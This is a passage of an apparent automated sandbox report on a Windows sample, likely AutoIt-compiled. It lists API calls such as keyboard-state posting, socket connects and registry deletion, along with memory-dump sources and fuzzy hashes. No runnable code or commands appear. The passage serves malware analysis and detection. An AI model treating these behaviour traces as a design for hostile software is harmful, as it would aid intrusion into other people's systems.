                                      • Part of subcall function 0089FC86: _wcscpy.LIBCMT ref: 0089FCA9
                                    • GetProcessId.KERNEL32(00000000), ref: 008FF5CD
                                    • CloseHandle.KERNEL32(00000000), ref: 008FF5FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                    • String ID: @
                                    • API String ID: 3522835683-2766056989
                                    • Opcode ID: 749913d6a983e6528ebcadb20c3f780781a6f0fe84200f496ddfe30a2c567cce
                                    • Instruction ID: 816ead354416cbdafaad82a72fa32d4dedb17ad5a98c03cfbb8cb2fc47a8d69b
                                    • Opcode Fuzzy Hash: 749913d6a983e6528ebcadb20c3f780781a6f0fe84200f496ddfe30a2c567cce
                                    • Instruction Fuzzy Hash: 3061AE75A006199FCF14EF68C4819AEBBF5FF49314F148069E95AEB752CB30AD41CB81
                                    APIs
                                    • GetParent.USER32(?), ref: 008E0F8C
                                    • GetKeyboardState.USER32(?), ref: 008E0FA1
                                    • SetKeyboardState.USER32(?), ref: 008E1002
                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 008E1030
                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 008E104F
                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 008E1095
                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008E10B8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: f8179aff22a19a73c4d77206caba15ab5ae20d02e906c8b02b2bfdfae85912cf
                                    • Instruction ID: a6266d93ab8678861d7c548ad40ae68681831c163210e16f7988730c2ac91a29
                                    • Opcode Fuzzy Hash: f8179aff22a19a73c4d77206caba15ab5ae20d02e906c8b02b2bfdfae85912cf
                                    • Instruction Fuzzy Hash: 1251C170618AD53DFF3642358C19BB6BEA9BB07304F084989E1D5C58C3C6E5D8D8DB51
                                    APIs
                                    • GetParent.USER32(00000000), ref: 008E0DA5
                                    • GetKeyboardState.USER32(?), ref: 008E0DBA
                                    • SetKeyboardState.USER32(?), ref: 008E0E1B
                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 008E0E47
                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 008E0E64
                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008E0EA8
                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008E0EC9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: 7c15f587591ba55324bf351d6740790dd74c909807f94138e8d50ea909227f6f
                                    • Instruction ID: 87037d3479e6f8e272551f2bd5c3c9a9e73e50da9a9c314b346689b72a63b2cb
                                    • Opcode Fuzzy Hash: 7c15f587591ba55324bf351d6740790dd74c909807f94138e8d50ea909227f6f
                                    • Instruction Fuzzy Hash: 7D51D5A05087D63DFB3282658C55B7A7EA9FB07300F084D99E1D4D68C2C7D5ACD8EB51
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _wcsncpy$LocalTime
                                    • String ID:
                                    • API String ID: 2945705084-0
                                    • Opcode ID: 602206b19cf8dc603487fa7dc6eaeb6e7d4908eec8f3c84f44b53526518710fb
                                    • Instruction ID: 64b0d5c537ba2825a043b269c038f8b4989fa7d522ce64efa4ad6a3e1ff92015
                                    • Opcode Fuzzy Hash: 602206b19cf8dc603487fa7dc6eaeb6e7d4908eec8f3c84f44b53526518710fb
                                    • Instruction Fuzzy Hash: EE41B365C10618B6DB11EBBC8C46ACFB3B8FF06310F508856F558E3621EA34E256C7A7
                                    APIs
                                      • Part of subcall function 008E466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008E3697,?), ref: 008E468B
                                      • Part of subcall function 008E466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008E3697,?), ref: 008E46A4
                                    • lstrcmpiW.KERNEL32(?,?), ref: 008E36B7
                                    • _wcscmp.LIBCMT ref: 008E36D3
                                    • MoveFileW.KERNEL32(?,?), ref: 008E36EB
                                    • _wcscat.LIBCMT ref: 008E3733
                                    • SHFileOperationW.SHELL32(?), ref: 008E379F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                    • String ID: \*.*
                                    • API String ID: 1377345388-1173974218
                                    • Opcode ID: a1bfe0627a42d8ba9c3dd8f2bf42c8428b77711e8198e9266c64540123935b97
                                    • Instruction ID: 2a1c213a72a0b06423e43020fe907704c1da7335884ab7f90e37191f991818ec
                                    • Opcode Fuzzy Hash: a1bfe0627a42d8ba9c3dd8f2bf42c8428b77711e8198e9266c64540123935b97
                                    • Instruction Fuzzy Hash: 6541817150C384AED751EF69C4459DF77E8FF8A390F00182EB49AC3261EA34D689C752
                                    APIs
                                    • _memset.LIBCMT ref: 009072AA
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00907351
                                    • IsMenu.USER32(?), ref: 00907369
                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009073B1
                                    • DrawMenuBar.USER32 ref: 009073C4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                    • String ID: 0
                                    • API String ID: 3866635326-4108050209
                                    • Opcode ID: 0a1de555eb658759ce3b1eeb5c0a51f30a42af7dd60a40fc132db336b477ecf4
                                    • Instruction ID: 75edf1561300b166e472fcec8df677d32eb7485a0931b6bf78cf1f3639c6a081
                                    • Opcode Fuzzy Hash: 0a1de555eb658759ce3b1eeb5c0a51f30a42af7dd60a40fc132db336b477ecf4
                                    • Instruction Fuzzy Hash: 5A412975A04208EFEB20DF94E884EAABBF9FB05320F148529FD5597290D730AD50EF50
                                    APIs
                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00900FD4
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00900FFE
                                    • FreeLibrary.KERNEL32(00000000), ref: 009010B5
                                      • Part of subcall function 00900FA5: RegCloseKey.ADVAPI32(?), ref: 0090101B
                                      • Part of subcall function 00900FA5: FreeLibrary.KERNEL32(?), ref: 0090106D
                                      • Part of subcall function 00900FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00901090
                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00901058
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                    • String ID:
                                    • API String ID: 395352322-0
                                    • Opcode ID: 5d6bca475eccd23b6856839f67e96b0f372a703550fe3d878007691722010a6f
                                    • Instruction ID: ce846032c8108e4ba62bc800cf8fc43f3c2fe51d9fcb34734553dd7e4241ec1f
                                    • Opcode Fuzzy Hash: 5d6bca475eccd23b6856839f67e96b0f372a703550fe3d878007691722010a6f
                                    • Instruction Fuzzy Hash: 69310D71915109BFEB259F90DC99EFFB7BCEF09300F000169E541E2191EB749F859AA0
                                    APIs
                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009062EC
                                    • GetWindowLongW.USER32(01562660,000000F0), ref: 0090631F
                                    • GetWindowLongW.USER32(01562660,000000F0), ref: 00906354
                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00906386
                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009063B0
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 009063C1
                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009063DB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: LongWindow$MessageSend
                                    • String ID:
                                    • API String ID: 2178440468-0
                                    • Opcode ID: 3e166dd75f8f61b29bdc1cc3d37d15cdf73040d7b4ba048ea040c73ec1a95b56
                                    • Instruction ID: 7008d97bb4ccb34a9c8163803faf2e27103e17ed0344feabb19f7854ad8989af
                                    • Opcode Fuzzy Hash: 3e166dd75f8f61b29bdc1cc3d37d15cdf73040d7b4ba048ea040c73ec1a95b56
                                    • Instruction Fuzzy Hash: 61311F35608255AFDB20CF58DC88F593BE9FB4A714F1901A8F5009F2F2CB72A950EB90
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008DDB2E
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008DDB54
                                    • SysAllocString.OLEAUT32(00000000), ref: 008DDB57
                                    • SysAllocString.OLEAUT32(?), ref: 008DDB75
                                    • SysFreeString.OLEAUT32(?), ref: 008DDB7E
                                    • StringFromGUID2.COMBASE(?,?,00000028), ref: 008DDBA3
                                    • SysAllocString.OLEAUT32(?), ref: 008DDBB1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                    • String ID:
                                    • API String ID: 3761583154-0
                                    • Opcode ID: 8b94ef12ecf37357db227a930092d329048e4a53bea0a4b98012fe24988801fb
                                    • Instruction ID: 74dfcb49ea165da60093475433204b43d9851cf354b439c5d572f7246bc060b7
                                    • Opcode Fuzzy Hash: 8b94ef12ecf37357db227a930092d329048e4a53bea0a4b98012fe24988801fb
                                    • Instruction Fuzzy Hash: 56216B36604319AFDB10AFA8DC88CBB73ACFB09364B018626FD14DB2A0D6709D419B60
                                    APIs
                                      • Part of subcall function 008F7D8B: inet_addr.WS2_32(00000000), ref: 008F7DB6
                                    • socket.WS2_32(00000002,00000001,00000006), ref: 008F61C6
                                    • WSAGetLastError.WS2_32(00000000), ref: 008F61D5
                                    • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 008F620E
                                    • connect.WSOCK32(00000000,?,00000010), ref: 008F6217
                                    • WSAGetLastError.WS2_32 ref: 008F6221
                                    • closesocket.WS2_32(00000000), ref: 008F624A
                                    • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 008F6263
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                    • String ID:
                                    • API String ID: 910771015-0
                                    • Opcode ID: 65686214e21971ff80e5e72c3bc1935c81de1600ef98df4385123c0879ce57b6
                                    • Instruction ID: 3fbfccd453376590c80935f43e0cfd1c3cb66ce6fdb8a2cd881620f889a4be5a
                                    • Opcode Fuzzy Hash: 65686214e21971ff80e5e72c3bc1935c81de1600ef98df4385123c0879ce57b6
                                    • Instruction Fuzzy Hash: B4318131600118AFEF10AF64CC85BBE77A9FF45764F048129FE06E7291DB70AD549BA2
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                    • API String ID: 1038674560-2734436370
                                    • Opcode ID: 1bd7dc0e5cb0cd8f8c1b7e983120026e4ccbd0dad1feb9d0181561d86046359f
                                    • Instruction ID: 386ad67f19a955ae6ccd192a4e807924caf2fabb26d7c76f8c0ac987e37554de
                                    • Opcode Fuzzy Hash: 1bd7dc0e5cb0cd8f8c1b7e983120026e4ccbd0dad1feb9d0181561d86046359f
                                    • Instruction Fuzzy Hash: 4621457220415166E321BA38AC02EE77398FF66358B14413BFA43C6692EB509D91E396
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008DDC09
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008DDC2F
                                    • SysAllocString.OLEAUT32(00000000), ref: 008DDC32
                                    • SysAllocString.OLEAUT32 ref: 008DDC53
                                    • SysFreeString.OLEAUT32 ref: 008DDC5C
                                    • StringFromGUID2.COMBASE(?,?,00000028), ref: 008DDC76
                                    • SysAllocString.OLEAUT32(?), ref: 008DDC84
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                    • String ID:
                                    • API String ID: 3761583154-0
                                    • Opcode ID: 08e5980bd631f6052886c174eb98b7cb7adfae3915c1bfbdcad2e9c7ab3a3246
                                    • Instruction ID: ac8eac4b06a1f84408fb7a666c477787104afd1c11ab68c0f4b6b13decba2ec7
                                    • Opcode Fuzzy Hash: 08e5980bd631f6052886c174eb98b7cb7adfae3915c1bfbdcad2e9c7ab3a3246
                                    • Instruction Fuzzy Hash: 6E213275618204AFDB20DBA8DC88DAB77ACFB09360B108226F915CB761D674DD41DB64
                                    APIs
                                      • Part of subcall function 00881D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00881D73
                                      • Part of subcall function 00881D35: GetStockObject.GDI32(00000011), ref: 00881D87
                                      • Part of subcall function 00881D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00881D91
                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00907632
                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0090763F
                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0090764A
                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00907659
                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00907665
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$CreateObjectStockWindow
                                    • String ID: Msctls_Progress32
                                    • API String ID: 1025951953-3636473452
                                    • Opcode ID: 842c65c3e4004d9a3bb53f9a9460f1527f9be4687e597551c25505323dadc341
                                    • Instruction ID: ba59136d0cefd84ab6c41c9646758ca0a4c35b77813c2585949f6877f6981df0
                                    • Opcode Fuzzy Hash: 842c65c3e4004d9a3bb53f9a9460f1527f9be4687e597551c25505323dadc341
                                    • Instruction Fuzzy Hash: D811B9B15101197FEF115FA4CC85EE7BF5DEF08798F014114B605A2090C672AC21DBA4
                                    APIs
                                    • __init_pointers.LIBCMT ref: 008A9AE6
                                      • Part of subcall function 008A3187: RtlEncodePointer.NTDLL(00000000), ref: 008A318A
                                      • Part of subcall function 008A3187: __initp_misc_winsig.LIBCMT ref: 008A31A5
                                      • Part of subcall function 008A3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 008A9EA0
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 008A9EB4
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 008A9EC7
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 008A9EDA
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 008A9EED
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 008A9F00
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 008A9F13
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 008A9F26
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 008A9F39
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 008A9F4C
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 008A9F5F
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 008A9F72
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 008A9F85
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 008A9F98
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 008A9FAB
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 008A9FBE
                                    • __mtinitlocks.LIBCMT ref: 008A9AEB
                                    • __mtterm.LIBCMT ref: 008A9AF4
                                      • Part of subcall function 008A9B5C: RtlDeleteCriticalSection.NTDLL(00000000), ref: 008A9C56
                                      • Part of subcall function 008A9B5C: _free.LIBCMT ref: 008A9C5D
                                      • Part of subcall function 008A9B5C: RtlDeleteCriticalSection.NTDLL(0093EC00), ref: 008A9C7F
                                    • __calloc_crt.LIBCMT ref: 008A9B19
                                    • __initptd.LIBCMT ref: 008A9B3B
                                    • GetCurrentThreadId.KERNEL32 ref: 008A9B42
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
